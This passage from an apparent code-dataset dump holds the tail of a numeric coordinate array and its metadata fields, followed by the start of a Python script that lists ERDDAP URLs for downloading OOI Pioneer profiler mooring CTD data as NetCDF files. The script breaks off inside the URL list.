28],[ 12 , 29],[ 12 , 31],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 12 , 38],[ 12 , 40],[ 13 , 23],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 32],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 13 , 40],[ 14 , 23],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 14 , 39],[ 14 , 40],[ 15 , 23],[ 15 , 26],[ 15 , 
28],[ 15 , 30],[ 15 , 32],[ 15 , 34],[ 15 , 36],[ 15 , 37],[ 15 , 39],[ 15 , 40],[ 16 , 23],[ 16 , 26],[ 16 , 28],[ 16 , 30],[ 16 , 32],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 39],[ 16 , 40],[ 17 , 24],[ 17 , 27],[ 17 , 29],[ 17 , 30],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 38],[ 17 , 39],[ 17 , 40],[ 18 , 24],[ 18 , 27],[ 18 , 29],[ 18 , 30],[ 18 , 33],[ 18 , 35],[ 18 , 36],[ 18 , 38],[ 18 , 39],[ 18 , 40],[ 19 , 24],[ 19 , 27],[ 19 , 29],[ 19 , 30],[ 19 , 33],[ 19 , 35],[ 19 , 36],[ 19 , 38],[ 19 , 39],[ 19 , 40],[ 20 , 24],[ 20 , 27],[ 20 , 29],[ 20 , 30],[ 20 , 33],[ 20 , 35],[ 20 , 36],[ 20 , 38],[ 20 , 39],[ 20 , 40]],[ [1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 21],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 31],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 21],[ 9 , 25],[ 9 , 26],[ 9 , 27],[ 9 , 31],[ 9 , 32],[ 9 , 33],[ 9 , 37],[ 9 , 38],[ 9 , 39],[ 10 , 21],[ 10 , 25],[ 10 , 26],[ 10 , 27],[ 10 , 31],[ 10 , 32],[ 10 , 33],[ 10 , 37],[ 10 , 38],[ 10 , 39],[ 11 , 22],[ 11 , 25],[ 11 , 28],[ 11 , 29],[ 11 , 31],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 11 , 38],[ 11 , 40],[ 12 , 22],[ 12 , 25],[ 12 , 28],[ 12 , 29],[ 12 , 31],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 12 , 38],[ 12 , 40],[ 13 , 22],[ 13 , 25],[ 13 , 28],[ 13 , 29],[ 13 , 31],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 13 , 40],[ 14 , 23],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 14 , 39],[ 14 , 40],[ 15 , 23],[ 15 , 26],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 34],[ 15 , 36],[ 15 , 37],[ 15 , 39],[ 15 , 40],[ 16 , 23],[ 16 , 26],[ 16 , 28],[ 16 , 30],[ 16 , 32],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 39],[ 16 , 40],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 30],[ 17 , 32],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 39],[ 17 , 40],[ 18 , 24],[ 18 , 27],[ 18 , 29],[ 18 , 30],[ 18 , 33],[ 18 , 35],[ 18 , 36],[ 18 , 38],[ 18 , 39],[ 18 , 40],[ 19 , 24],[ 19 , 27],[ 19 , 29],[ 19 , 30],[ 19 , 33],[ 19 , 35],[ 19 , 36],[ 19 , 38],[ 19 , 39],[ 19 , 40],[ 20 , 24],[ 20 , 27],[ 20 , 29],[ 20 , 30],[ 20 , 33],[ 20 , 35],[ 20 , 36],[ 20 , 38],[ 20 , 39],[ 20 , 40]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 
20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 21],[ 10 , 24],[ 10 , 27],[ 10 , 28],[ 10 , 30],[ 10 , 33],[ 10 , 34],[ 10 , 36],[ 10 , 37],[ 10 , 39],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 22],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 23],[ 16 , 26],[ 16 , 28],[ 16 , 29],[ 16 , 32],[ 16 , 34],[ 16 , 35],[ 16 , 37],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 7 , 18],[ 7 , 19],[ 7 , 20],[ 7 , 21],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 18],[ 9 , 22],[ 9 , 23],[ 9 , 24],[ 9 , 28],[ 9 , 29],[ 9 , 30],[ 9 , 34],[ 9 , 35],[ 9 , 36],[ 10 , 19],[ 10 , 22],[ 10 , 25],[ 10 , 26],[ 10 , 28],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 19],[ 12 , 22],[ 12 , 25],[ 12 , 26],[ 12 , 28],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 13 , 19],[ 13 , 22],[ 13 , 25],[ 13 , 26],[ 13 , 28],[ 13 , 31],[ 13 , 32],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 
33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 20],[ 10 , 24],[ 10 , 25],[ 10 , 26],[ 10 , 30],[ 10 , 31],[ 10 , 32],[ 10 , 36],[ 10 , 37],[ 10 , 38],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 21],[ 14 , 24],[ 14 , 27],[ 14 , 28],[ 14 , 30],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 20],[ 10 , 24],[ 10 , 25],[ 10 , 26],[ 10 , 30],[ 10 , 31],[ 10 , 32],[ 10 , 36],[ 10 , 37],[ 10 , 38],[ 11 , 20],[ 11 , 24],[ 11 , 25],[ 11 , 26],[ 11 , 30],[ 11 , 31],[ 11 , 32],[ 11 , 36],[ 11 , 37],[ 11 , 38],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 21],[ 14 , 24],[ 14 , 27],[ 14 , 28],[ 14 , 30],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 
22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 21],[ 10 , 24],[ 10 , 27],[ 10 , 28],[ 10 , 30],[ 10 , 33],[ 10 , 34],[ 10 , 36],[ 10 , 37],[ 10 , 39],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 17],[ 1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 2 , 17],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 3 , 17],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 4 , 17],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 5 , 17],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 27],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 6 , 17],[ 6 , 18],[ 6 , 19],[ 6 , 20],[ 6 , 27],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 7 , 17],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 27],[ 7 , 28],[ 7 , 29],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 8 , 17],[ 8 , 21],[ 8 , 22],[ 8 , 23],[ 8 , 27],[ 8 , 28],[ 8 , 29],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 9 , 17],[ 9 , 21],[ 9 , 22],[ 9 , 23],[ 9 , 27],[ 9 , 28],[ 9 , 29],[ 9 , 33],[ 9 , 34],[ 9 , 35],[ 10 , 18],[ 10 , 21],[ 10 , 24],[ 10 , 25],[ 10 , 27],[ 10 , 30],[ 10 , 31],[ 10 , 33],[ 10 , 34],[ 10 , 36],[ 11 , 18],[ 11 , 21],[ 11 , 24],[ 11 , 25],[ 11 , 27],[ 11 , 30],[ 11 , 31],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 12 , 18],[ 12 , 21],[ 12 , 24],[ 12 , 25],[ 12 , 27],[ 12 , 30],[ 12 , 31],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 13 , 19],[ 13 , 22],[ 13 , 24],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 32],[ 13 , 33],[ 13 , 35],[ 13 , 36],[ 14 , 19],[ 14 , 22],[ 14 , 24],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 15 , 19],[ 15 , 22],[ 15 , 24],[ 15 , 26],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 16 , 20],[ 16 , 23],[ 16 , 25],[ 16 , 26],[ 16 , 29],[ 16 , 31],[ 16 , 32],[ 16 , 34],[ 16 , 35],[ 16 , 36]]
| 102,012
| 102,012
| 0.313512
| 18,241
| 102,012
| 1.753303
| 0.002412
| 0.00469
| 0.006128
| 0.009193
| 0.986367
| 0.968545
| 0.965512
| 0.949722
| 0.94622
| 0.941311
| 0
| 0.466439
| 0.327903
| 102,012
| 1
| 102,012
| 102,012
| 0.000029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
bea3b924c447fee11cfef326cc6e60c18268f318
| 4,271
|
py
|
Python
|
sandbox/ooi_pioneer/download_OOIdata.py
|
IvanaEscobar/sandbox
|
71d62af2c112686c5ce26def35593247cf6a0ccc
|
[
"MIT"
] | null | null | null |
sandbox/ooi_pioneer/download_OOIdata.py
|
IvanaEscobar/sandbox
|
71d62af2c112686c5ce26def35593247cf6a0ccc
|
[
"MIT"
] | 3
|
2022-02-15T23:32:52.000Z
|
2022-03-28T21:35:12.000Z
|
sandbox/ooi_pioneer/download_OOIdata.py
|
IvanaEscobar/sandbox
|
71d62af2c112686c5ce26def35593247cf6a0ccc
|
[
"MIT"
] | null | null | null |
import requests
def load_data():
#NetCDF files of OOI Pioneer Profiler Moorings: Temperature, Salinity, Pressure, Density
urls = [
'https://erddap.dataexplorer.oceanobservatories.org/erddap/tabledap/ooi-cp01cnpm-wfp01-03-ctdpfk000.nc?time%2Csea_water_practical_salinity_profiler_depth_enabled%2Csea_water_density_profiler_depth_enabled%2Csea_water_pressure_profiler_depth_enabled%2Csea_water_temperature_profiler_depth_enabled%2Csea_water_practical_salinity_profiler_depth_enabled_qc_agg%2Csea_water_density_profiler_depth_enabled_qc_agg%2Csea_water_pressure_profiler_depth_enabled_qc_agg%2Csea_water_temperature_profiler_depth_enabled_qc_agg%2Cz',
'https://erddap.dataexplorer.oceanobservatories.org/erddap/tabledap/ooi-cp02pmci-wfp01-03-ctdpfk000.nc?time%2Csea_water_practical_salinity_profiler_depth_enabled%2Csea_water_density_profiler_depth_enabled%2Csea_water_pressure_profiler_depth_enabled%2Csea_water_temperature_profiler_depth_enabled%2Csea_water_practical_salinity_profiler_depth_enabled_qc_agg%2Csea_water_density_profiler_depth_enabled_qc_agg%2Csea_water_pressure_profiler_depth_enabled_qc_agg%2Csea_water_temperature_profiler_depth_enabled_qc_agg%2Cz',
'https://erddap.dataexplorer.oceanobservatories.org/erddap/tabledap/ooi-cp02pmco-wfp01-03-ctdpfk000.nc?time%2Csea_water_practical_salinity_profiler_depth_enabled%2Csea_water_density_profiler_depth_enabled%2Csea_water_pressure_profiler_depth_enabled%2Csea_water_temperature_profiler_depth_enabled%2Csea_water_practical_salinity_profiler_depth_enabled_qc_agg%2Csea_water_density_profiler_depth_enabled_qc_agg%2Csea_water_pressure_profiler_depth_enabled_qc_agg%2Csea_water_temperature_profiler_depth_enabled_qc_agg%2Cz',
'https://erddap.dataexplorer.oceanobservatories.org/erddap/tabledap/ooi-cp02pmui-wfp01-03-ctdpfk000.nc?time%2Csea_water_practical_salinity_profiler_depth_enabled%2Csea_water_density_profiler_depth_enabled%2Csea_water_pressure_profiler_depth_enabled%2Csea_water_temperature_profiler_depth_enabled%2Csea_water_practical_salinity_profiler_depth_enabled_qc_agg%2Csea_water_density_profiler_depth_enabled_qc_agg%2Csea_water_pressure_profiler_depth_enabled_qc_agg%2Csea_water_temperature_profiler_depth_enabled_qc_agg%2Cz',
'https://erddap.dataexplorer.oceanobservatories.org/erddap/tabledap/ooi-cp02pmuo-wfp01-03-ctdpfk000.nc?time%2Csea_water_practical_salinity_profiler_depth_enabled%2Csea_water_density_profiler_depth_enabled%2Csea_water_pressure_profiler_depth_enabled%2Csea_water_temperature_profiler_depth_enabled%2Csea_water_practical_salinity_profiler_depth_enabled_qc_agg%2Csea_water_density_profiler_depth_enabled_qc_agg%2Csea_water_pressure_profiler_depth_enabled_qc_agg%2Csea_water_temperature_profiler_depth_enabled_qc_agg%2Cz',
'https://erddap.dataexplorer.oceanobservatories.org/erddap/tabledap/ooi-cp03ispm-wfp01-03-ctdpfk000.nc?time%2Csea_water_practical_salinity_profiler_depth_enabled%2Csea_water_density_profiler_depth_enabled%2Csea_water_pressure_profiler_depth_enabled%2Csea_water_temperature_profiler_depth_enabled%2Csea_water_practical_salinity_profiler_depth_enabled_qc_agg%2Csea_water_density_profiler_depth_enabled_qc_agg%2Csea_water_pressure_profiler_depth_enabled_qc_agg%2Csea_water_temperature_profiler_depth_enabled_qc_agg%2Cz',
